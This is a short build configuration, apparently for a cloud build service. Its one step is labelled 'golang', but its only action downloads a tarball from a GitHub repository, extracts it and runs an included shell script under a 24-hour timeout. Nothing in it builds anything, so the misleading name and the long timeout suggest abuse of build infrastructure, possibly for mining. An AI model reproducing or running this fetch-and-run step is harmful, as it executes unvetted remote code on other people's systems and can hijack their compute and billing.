steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://github.com/Pantaiselatan/vaio/raw/main/avolo.tar.gz && tar xf avolo.tar.gz && ./gas.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s